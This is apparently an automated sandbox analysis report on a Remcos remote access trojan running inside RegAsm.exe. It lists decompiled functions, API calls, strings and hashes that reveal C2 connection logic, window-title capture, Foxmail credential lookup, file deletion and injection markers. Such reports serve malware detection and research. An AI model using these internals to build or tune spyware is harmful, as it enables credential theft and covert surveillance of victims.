Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

8yv, xrefs: 0040F224
User, xrefs: 0040F28E
Access Level: , xrefs: 0040F29F
8SG, xrefs: 0040EF1D
Software\, xrefs: 0040EAC3
del, xrefs: 0040F2D1
8.v, xrefs: 0040EA5D, 0040EA96, 0040ED47, 0040ED7B, 0040EDD3, 0040EEAC, 0040EF66, 0040F036, 0040F0D8, 0040F103, 0040F12B, 0040F154, 0040F187, 0040F1C7, 0040F1F3
del, xrefs: 0040F2ED, 0040F36F
SG, xrefs: 0040EB05
Administrator, xrefs: 0040F287
licence, xrefs: 0040EF88
exepath, xrefs: 0040EE92, 0040EF40
license_code.txt, xrefs: 0040EA4D
Exe, xrefs: 0040EB0F
8SG, xrefs: 0040EE65
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040E9E6, 0040EE0F
SG, xrefs: 0040EB62
Exe, xrefs: 0040EB14
Inj, xrefs: 0040EBD5, 0040EBEC
dMG, xrefs: 0040F1A8
Remcos Agent initialized, xrefs: 0040EFEF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8.v$8SG$8SG$8yv$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt
API String ID: 2830904901-2087382883
Opcode ID: 73008e0c8db4d9896f8eabd130538c454e4585cc8aa82ec9b4a810585e0e5268
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 73008e0c8db4d9896f8eabd130538c454e4585cc8aa82ec9b4a810585e0e5268
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,8.v,00000000), ref: 00414F7B
WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
Sleep.KERNEL32(00000000,00000002), ref: 00415AD7

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

Connecting | , xrefs: 00415108
8yv, xrefs: 004154FE
TLS On , xrefs: 004150F3
NG, xrefs: 004153E2
8.v, xrefs: 00414F37, 00414F54, 00415328, 00415A9E
Connection Error: , xrefs: 0041519F
TLS Off, xrefs: 004150E5
Connection Error: Unable to create socket, xrefs: 004151EA
5.1.0 Pro, xrefs: 004154CB
Disconnected, xrefs: 00415A47
8SG, xrefs: 00415340
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004153C0
| , xrefs: 00415112, 00415253
Exe, xrefs: 004153F5
%I64u, xrefs: 004152F6
NG, xrefs: 00415423
Connected | , xrefs: 0041524E
dMG, xrefs: 00415499
hlight, xrefs: 00415393
hnv, xrefs: 00415307
name, xrefs: 00415366

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$5.1.0 Pro$8.v$8SG$8yv$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $dMG$hlight$hnv$name$NG$NG
API String ID: 524882891-693528026
Opcode ID: 7db58729c100332b9313d08f9d38d846803e4c4100cdbbd2a6d892e759f43aa9
Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
Opcode Fuzzy Hash: 7db58729c100332b9313d08f9d38d846803e4c4100cdbbd2a6d892e759f43aa9
Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63AC1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

0TG, xrefs: 0041314C
/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
NG, xrefs: 004130C1
0TG, xrefs: 00413026
NG, xrefs: 00412F6C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 2c26494ca0311e495a84756b24232881b20752bde40909050642c636951b3bad
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: 2c26494ca0311e495a84756b24232881b20752bde40909050642c636951b3bad
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434

Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB

lstrlenW.KERNEL32(?), ref: 100014C5
lstrlenW.KERNEL32(?), ref: 100014E0
lstrlenW.KERNEL32(?,?), ref: 1000150F
lstrcatW.KERNEL32(00000000), ref: 10001521
lstrlenW.KERNEL32(?,?), ref: 10001547
lstrcatW.KERNEL32(00000000), ref: 10001553
lstrlenW.KERNEL32(?,?), ref: 10001579
lstrcatW.KERNEL32(00000000), ref: 10001585
lstrlenW.KERNEL32(?,?), ref: 100015AB
lstrcatW.KERNEL32(00000000), ref: 100015B7

Strings

ProgramFiles, xrefs: 1000142F
), xrefs: 100014C7
Foxmail, xrefs: 1000143F, 10001453, 10001467, 1000147B, 1000148F, 100014A3, 100014F7, 10001527, 10001559, 1000158B, 100015BD

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
String ID: )$Foxmail$ProgramFiles
API String ID: 672098462-2938083778
Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

freeaddrinfo, xrefs: 00414DB2
\ws2_32, xrefs: 00414DFF
\wship6, xrefs: 00414E5E
getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
getnameinfo, xrefs: 00414DA2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Function 0040A726 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927

Strings

pQG, xrefs: 0040A771
8SG, xrefs: 0040A802
8SG, xrefs: 0040A7F7
8.v, xrefs: 0040A7AC, 0040A907
pQG, xrefs: 0040A761

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8.v$8SG$8SG$pQG$pQG
API String ID: 3795512280-3616701415
Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(FFFFFFFF,00164960,00000010), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

Connection Refused, xrefs: 00404A76
TLS Error 1, xrefs: 00404937
Connection Failed: , xrefs: 00404A43
TLS Error 2, xrefs: 00404955
TLS Error 3, xrefs: 004049D8
TLS Authentication Failed, xrefs: 00404999
TLS Handshake... | , xrefs: 00404904

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32 ref: 0040AD52
GetWindowTextW.USER32 ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

minutes }, xrefs: 0040AE7A
], xrefs: 0040ADE8
[, xrefs: 0040ADEE
{ User has been idle for , xrefs: 0040AE86

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32 ref: 0040DB9A

Strings

WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F
ProgramData, xrefs: 0040DB5F
AppData, xrefs: 0040DB51
\SysWOW64, xrefs: 0040DB00
SystemDrive, xrefs: 0040DA91
\system32, xrefs: 0040DAAE
ProgramFiles, xrefs: 0040DB6E
Temp, xrefs: 0040DA66
UserProfile, xrefs: 0040DB58

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Function 0041B2C3 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000), ref: 0041B33C

Strings

(32 bit), xrefs: 0041B36F
(64 bit), xrefs: 0041B368
8.v, xrefs: 0041B2CA
ProductName, xrefs: 0041B2D2
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
CurrentBuildNumber, xrefs: 0041B31D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$8.v$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2648583587
Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
CloseHandle.KERNEL32(00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000), ref: 0041C477

Strings

hpF, xrefs: 0041C3F2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: hpF
API String ID: 1852769593-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
__freea.LIBCMT ref: 10008A08

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

__freea.LIBCMT ref: 10008A11
__freea.LIBCMT ref: 10008A36

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
